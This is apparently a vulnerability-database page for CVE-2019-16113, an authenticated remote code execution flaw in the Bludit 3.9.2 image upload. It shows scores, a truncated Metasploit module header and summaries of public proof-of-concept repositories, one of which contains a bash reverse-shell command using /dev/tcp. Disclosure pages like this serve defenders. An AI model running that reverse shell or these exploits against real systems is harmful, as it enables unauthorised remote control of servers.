CVE-2019-16113

Published: 08/09/2019 Updated: 26/04/2022
CVSS v2 Base Score: 6.5 | Impact Score: 6.4 | Exploitability Score: 8
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 659
Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

Vulnerability Summary

Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg file name, and then this PHP code can write other PHP code to a ../ pathname.

Vulnerable Products

bludit bludit 3.9.2

Exploits

##
# This module requires Metasploit: metasploit.com/download
# Current source: github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE
  include Msf::Exploit::FileDropper
  include Msf::Auxiliary: ...
Bludit version 3912 suffers from a directory traversal vulnerability ...
Bludit version 3.9.2 suffers from a directory traversal vulnerability ...

Github Repositories

CVE-2019-16113 This is a Python implementation PoC for the Bludit Directory Traversal Image File Upload Vulnerability CVE-2019-16113. Bludit 3.9.2 allows remote code execution via bl-kernel/ajax/upload-images.php because PHP code can be entered with a .jpg (or .png) file name, and then this PHP code can write other PHP code to a ../ pathname. Original credit: christasa - Origina

CVE-2019-16113 - bludit >= 3.9.2 RCE authenticate

CVE-2019-16113 CVE-2019-16113 - bludit >= 3.9.2 RCE authenticate Usage python CVE-2019-16113.py -u 10101010 -user user -pass secret -c "bash -c 'bash -i >& /dev/tcp/101014172/1337 0>&1'" Example

ExploitDev Journey #4 | CVE-2019-16113 | Bludit 3.9.2 - Authenticated RCE Original Exploit: www.exploit-db.com/exploits/48701 Exploit name: Bludit 3.9.2 - Authenticated RCE CVE: 2019-16113 Lab: Blunder - HackTheBox Description There is a misconfiguration in the image upload functionality of Bludit that allows an authenticated user to upload any type of file. All you nee

ExploitDev Journey #5 | Gym Management 1.0 unauthenticated RCE Original Exploit: www.exploit-db.com/exploits/48506 Exploit name: Gym Management 1.0 unauthenticated RCE CVE: N/A Lab: Buff - HackTheBox Description There is an unrestricted image upload path within the Gym Management 1.0 web app that allows unauthenticated users to upload files. The functionality also suffe

Bludit 3.9.2 - Remote command execution - CVE-2019-16113

Bludit 3.9.2 - Remote command execution - CVE-2019-16113 This exploit combines two exploits in Bludit CMS 3.9.2 to gain remote code execution on the target system. The original exploits are CVE-2019-17240 & CVE-2019-16113. Features Bruteforce password + RCE Bruteforce username:password + RCE Reproduce Setup Bludit 3.9.2 CMS Configure login details run the exploit: p

ExploitDev Journey #8 | CVE-2019-11447 | CuteNews 2.1.2 - Authenticated Remote Command Execution Original Exploit: www.exploit-db.com/exploits/48800 Exploit name: CuteNews 2.1.2 Authenticated RCE CVE: 2019-11447 Lab: Passage - HackTheBox Description This application has a flaw that allows uploading image files if they look like images; it checks the beginning of the

Bludit 3.9.2 Remote Command Execution (RCE)

CVE-2019-16113 Bludit 3.9.2 Remote Command Execution (RCE)

Bludit >= 3.9.2 - Authenticated RCE (CVE-2019-16113)

CVE-2019-16113 PoC Bludit >= 3.9.2 Remote Code Execution Vulnerability via "Upload function" Simple Python PoC Discovery by @christasa: bludit/bludit#1081 Usage Edit the script with your URL, username, password and command to execute, then run the script: $ python CVE-2019-16113.py [+] Loggin successful [+] Token CSRF: 20b903ffe72490f004b9255521ea2e0419e73dce